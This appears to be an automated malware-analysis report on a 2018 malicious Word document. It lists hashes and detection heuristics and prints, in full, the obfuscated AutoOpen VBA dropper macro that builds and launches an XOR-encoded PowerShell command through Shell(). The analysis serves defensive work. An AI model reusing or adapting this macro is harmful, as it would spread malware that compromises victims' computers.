Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 00af5535fa6566c6…

MALICIOUS

Office (OLE)

218.2 KB Created: 2018-06-26 12:55:00 Authoring application: Microsoft Office Word First seen: 2018-07-04
MD5: ae3b1d92c6ecbe2a660cc82152ca109f SHA-1: 5437b874de68cac4342983404c8f09e821d343b7 SHA-256: 00af5535fa6566c62f5350676e02d39077d64078b3ef68bd87f7b1515d26258c
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is a malicious Word document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6592316-0' further supports its malicious nature as a dropper. The macro's obfuscated string concatenation suggests it is designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592316-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    sfBuN = CDate(50678)
    NtSrfmiP = YPmJUnHm + bRoBcCUAwH + Shell(lRYrmpV + wzaiPHou + orkQiDJzU, (28857 / 28857) - 1)
    iBbhbB = 22296
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8392 bytes
SHA-256: 974e0f526c6300aca245b18e1739703b3942f79f486641b50457e92a08764a93
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bGLvNzP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mfiEnVvaTPk"
Function jGdMb()
On Error Resume Next
JDmzs = Sin(92883)
lFKIuh = 24245
ZRmarz = CDate(52493)
KwdwrS = 77688
wZXjj = 26947
fqVofi = IlmUKW
AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $"
JrivuC = CDate(56994)
VtliaL = Sin(82219)
svJjEP = XkwwMd
EswwKA = 14775
CSZnb = 88983
YZCOD = 7576
IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4"
MLdvw = Sin(38044)
oXXna = CDate(47504)
qCnDN = uPWiOD
YImCO = 1297
kzoitX = 49332
iDEhl = 86747
rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5"
huKUYJ = 69260
PYLnal = 4215
tmQjw = 88749
OoPMRc = Sin(64373)
jwHiDz = QkoMVh
TQOGHn = CDate(97978)
IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_"
TinYuv = 92282
CQLfY = 43832
wJPbL = 97151
IzEBs = Sin(95591)
oIPCBz = iqzqW
ECZfqK = CDate(73751)
hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4"
MBfHm = 62833
IRQwR = 87228
VstodC = 42332
fHdwi = Sin(46523)
kTaZX = UrIGB
MkbSa = CDate(39427)
RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5"
NLcBV = 2071
LRZpRQ = 60584
jfJWUN = 61297
GRUPiP = Sin(58298)
cnwvo = inSnqw
AikUiz = CDate(16238)
arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47"
BLEjtd = 50556
jXublP = 36227
SZFpIo = 69181
wqwWM = Sin(58896)
DzHPbT = SmwhAS
OOhoR = CDate(63987)
VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60"
jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj
bzSLVv = 94634
PHMIFV = 42597
qBvOnR = 82620
lYEDC = Sin(68955)
GiNKww = uaQsN
IBjMD = CDate(38337)
End Function
Function oZQlHB()
On Error Resume Next
NHEnGU = 53624
XYTjZ = 10575
psnKzG = 64475
soVrCs = Sin(12529)
tREfV = ivwcAN
XjEpN = CDate(6720)
CkOFNKA = "x48x5" + "0{112I1" + "07" + ">27E47" + "!9E" + "112!3" + "1j55_43_" + "43!47"
mmQBrY = 18293
LpsRf = 70386
GnfWY = 94293
tzNCw = Sin(19210)
jTXij = zrOKC
FCTXLw = CDate(2917)
FPaaASwvDC = "v1" + "01E112I1" + "12_5" + "4v59v58" + "!62{51x" + "61"
cCBlpl = 12089
RtmNzQ = 62336
uAHGq = 44824
IELMnM = Sin(57051)
TUtzW = RjGWH
hCMLll = CDate(76114)
WnKJFirYi = "v62E5" + "1v62Q49Q" + "60!58>1" + "13I55E" + "42Q" + "112x1"
LwrOkv = 1815
povlQ = 72700
KUtQHa = 8065
UhWYom = Sin(10707)
WZhDRS = EMQUIb
MbwwA = CDate(90967)
AJEIcVa = "1Q111!" + "48v8>53I" + "112Q" + "31j55" + "{43I4" + "3x47{101" + "_112I1" + "12v40Q40"
fbFiQ = 61429
cMWiU = 4555
nmCGYO = 69197
CORjn = Sin(99300)
JLcsO = MCinDW
KwvXU = CDate(93998)
ZzqkoD = "_4" + "0I113_51" + "Q38E44Q" + "54E5" + "2I" + "48_4" + "1_11" + "3>45_4" + "2{11" + "2_7I61!1" + "03x59E1" + "02j10"
GLAtnv = 73683
tKvdz = 56336
TWWiw = 30597
KAQCZ = Sin(85909)
JPGGSQ = jWOwEz
KaVjta = CDate(50618)
MqDsRCAvS = "8{21>1" + "12" + "x31{55" + "{4" + "3I43v" + "47j101I1" + "12j112" + "!39v6" + "2!53" + ">57"
NNWBfi = 53203
YPzJZo = 46675
hCXHU = 22545
nlMdmF = Sin(26937)
CNNDEF = fVrSL
LouENp = CDate(26719)
wSJAItnb = "_56" + "E37E11" + "3E6" + "0{48v50Q" + "112!" + "61>10" + "2E26" + "E56E8"
aGjXz = 40177
HOSrN = 54093
fpZITM = 23026
QLkQLk = Sin(15472)
Ecbhp = MXaiir
LYYwz = CDate(32755)
mOOLTUt = "!11" + "2v1" + "20_113Q1" + "2!47x51>" + "54j43" + "I1" + "19>" + "12" + "0I31E12" + "0x118"
OkvOMB = 11200
aiziW = 35486
OtSjz = 44399
EZUwab = Sin(4091)
JXAQii = sJqWT
PvBdf = CDate(36297)
nvZzRm = "_100x12" + "3>62j25v" + "51>12" + "7x98v127" + "Q120{11" + "0v103I" + "104>120x" + "100v1" + "23Q" + "48_2" + "7Q"
oZQlHB = CkOFNKA + FPaaASwvDC + WnKJFirYi + AJEIcVa + ZzqkoD + MqDsRCAvS + wSJAItnb + mOOLTUt + nvZzRm
DlztJv = 42989
icfKG = 63392
njVXsf = 23542
mhrzz = Sin(84488)
Rfzdb = cmDhY
pzzzd = CDate(71003)
End Function
Function bZHcj()
On Error Resume Next
Yvfiva = 88356
rUFpfi = 24338
WpYqv = 52258
oTQrAh = Sin(88033)
nitAI = hFUjCO
FwjdI = CDate(86851)
kfJsqwjYR = "6x98j" + "123" + "_5" + "8j49>4" + "1_101j4" + "3v58j5" + "0Q4" + "7x" + "11"
rMwXf = 35876
TaWcVi = 61931
QKOSc = 54848
HZzYz = Sin(15695)
jDjjrw = EilDR
hoTBB = CDate(28267)
hbYdVNJWkC = "6!120x3{" + "120j116" + "I12" + "3!62E25_" + "51Q116_" + "120{11" + "3j58j3" + "9Q58>1" + "20E100" + "_57I48"
WuRaNY = 93688
uArEbc = 6819
DikNEJ = 63049
GTDqI = Sin(83934)
IKtBN = WFJAZ
nfzvL = CDate(21023)
zHVpFjlin = "!45E58_6" + "2I60I" + "55x" + "119" + "v123j40" + "v59j5" + "5_127I5" + "4{49" + "I127{12" + "3x62Q" + "26"
ljjvcT = Sin(72193)
ASvUtN = SooLKz
KAccrP = 31114
owDuMJ = CDate(11781)
OVXoj = 32204
zidLNz = 64875
zWoMAfnjO = "v44v118" + "_36v" + "43" + ">45I3" + "8I36I1" + "23" + "v49x10!" + "7>11" + "3v27_4" + "8>40"
PNDmA = Sin(57896)
SwtDa = FdcUCI
AjUDuw = 61840
fZhVrs = CDate(50395)
DUzIV = 44445
OWXLnp = 25848
zLTTKvhoC = "!49!51E4" + "8x62x59E" + "25>54!" + "51_58" + "x119!123" + "x40E59" + "j55{11" + "5E1" + "27E" + "12" + "3!4" + "8I27j6_1"
KAkrSV = Sin(93875)
rGJStP = vvEZBO
sGzVm = 24317
hkNDdm = CDate(31679)
dSwUil = 55402
RQHAl = 83987
NjLzRMtrKz = "18!100" + "{12!4" + "3x62>4" + "5v43" + "E114I15{" + "45x4" + "8v6"
WiBzUf = Sin(67097)
BUzNo = zKizF
rMCaq = 80782
SIIRj = CDate(49253)
QXoTrB = 62146
EpJvtU = 76060
KjWDXTF = "0x" + "58x4" + "4_44" + "_127Q1" + "23" + ">48" + "E27v6" + "j10"
pDvGZv = Sin(93838)
GDPEd = jWmfUn
EYBLch = 31550
bFqml = CDate(40816)
MWqqpj = 91180
zFQYGm = 55385
tNSUrBZbpj = "0>61" + "_45" + "Q58{6" + "2I52x10" + "0I34" + "!60{62x4" + "3I6"
BccGC = Sin(64486)
vnYuj = Nowkf
PlnHSk = 75497
SBAQi = CDate(27038)
Awqzqk = 50715
bYhWBI = 23408
UqRBAGY = "0j55x36v" + "34Q34'" + ".SpliT" + Chr(40) + " '{Q!v" + "E>_Ijx'" + Chr(41) + " | fOrE" + "AcH" + "-Ob" + "JeCT{" + "[chAr" + "] " + Chr(40) + " $_-B" + "XoR 0x5"
DnsSZj = Sin(1737)
RFJYq = wzZDw
tCGXK = 83150
WThMMB = CDate(40823)
OUAsh = 67426
ImUHZu = 88334
wAMKlfrl = "F " + Chr(41) + "}" + Chr(41) + Chr(43) + Chr(34) + "$" + Chr(40) + " Sv" + " 'Ofs'  " + "' '" + Chr(41) + " " + Chr(34) + Chr(41) + "   "
bZHcj = kfJsqwjYR + hbYdVNJWkC + zHVpFjlin + zWoMAfnjO + zLTTKvhoC + NjLzRMtrKz + KjWDXTF + tNSUrBZbpj + UqRBAGY + wAMKlfrl
dGitL = Sin(80329)
dQSpwE = qHlvJ
zTfFiY = 89353
QLoSC = CDate(82980)
ihWtsD = 48066
kWQHCz = 77549
End Function


Attribute VB_Name = "KCbwpvbSk"
Function btSjzrCpl()
On Error Resume Next
kwSvB = 21840
VbbUAl = Sin(81035)
NusDI = 11314
hfoLDd = dIJIEF
KaNCXN = 64690
wIwWho = CDate(99856)
jKXLSCMF = FDNqDkT + Chr(fqnwzvQ + 80 + XCGSJzQm) + "ow" + "ers"
rAUkQj = 31112
Haraq = Sin(54883)
mfkDTi = 2444
sKYvqs = cZjnh
jFDUsP = 89040
MurFAU = CDate(92647)
BJuGv = 4293
RPdqk = Sin(47440)
ASACZj = 67830
OGJAKE = aMrLS
wHrGP = 83415
cTjbfI = CDate(69495)
btSjzrCpl = KSbotIYZ + jKXLSCMF + jGdMb + oZQlHB + bZHcj
nKfkj = 79029
RlzRNP = Sin(12590)
sIIip = 9207
JwKpK = EMDFI
sLjBat = 18413
hjuOa = CDate(44635)
End Function
Function fdNDOwjX(wzaiPHou)
On Error Resume Next
CVjij = 93619
hJNLzf = Sin(15133)
dVWXr = 10401
Ghkfk = wRZFU
naFovV = 73587
PjhiiH = CDate(30603)
INrDzm = 28847
lzNBIb = Sin(73801)
ptljf = 46675
bCFAGl = FwoqR
LuXIj = 91683
sfBuN = CDate(50678)
NtSrfmiP = YPmJUnHm + bRoBcCUAwH + Shell(lRYrmpV + wzaiPHou + orkQiDJzU, (28857 / 28857) - 1)
iBbhbB = 22296
iUwOU = Sin(19477)
prqIuu = 43284
DjiYNK = CUWLU
apIfZk = 58606
aDYwr = CDate(55063)
End Function
Sub AutoOpen()
On Error Resume Next
BlnAzd = 47448
omJZCz = Sin(73105)
XCFnPC = 65256
VKsAYi = rlJpv
BOGiQX = 65735
TljSM = CDate(74022)
Application.Run "fdNDOwjX", btSjzrCpl
PQOwmT = 11382
kdjni = Sin(49356)
BhrWnz = 16769
izzUYE = aEiOzX
VnCcjK = 59609
fNRUK = CDate(58216)
End Sub